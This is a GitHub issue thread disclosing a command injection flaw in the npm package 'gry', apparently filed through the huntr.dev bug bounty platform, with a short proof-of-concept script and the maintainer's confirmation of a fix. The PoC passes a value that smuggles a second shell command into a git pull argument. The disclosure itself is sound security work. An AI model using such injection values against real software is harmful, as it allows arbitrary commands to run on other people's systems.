### ISSUE TITLE
huntr.dev - Command Injection

### ISSUE THREAD

**Issue by huntr-helper** [IonicaBizau/node-gry#21]
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

## Vulnerability Description
The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check. The issue arises here: https://github.com/IonicaBizau/node-gry/blob/master/lib/index.js#L149

## Steps To Reproduce:
1. Create the following PoC file:

```js
// poc.js
const Repo = require("gry");
var myRepo = new Repo(".");
myRepo.pull('test; touch HACKED; #', function(){console.log('Finished!')})

```
2. Check there aren't files called `HACKED` 
3. Execute the following commands in another terminal:

```bash
npm i gry # Install affected module
node poc.js #  Run the PoC
```
4. Recheck the files: now `HACKED` has been created

**Bug Bounty**

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

**Comment by JamieSlome** [comment]
@IonicaBizau  Resolved with #23?

**Comment by IonicaBizau** [comment]
yes, right! :) Thank you!
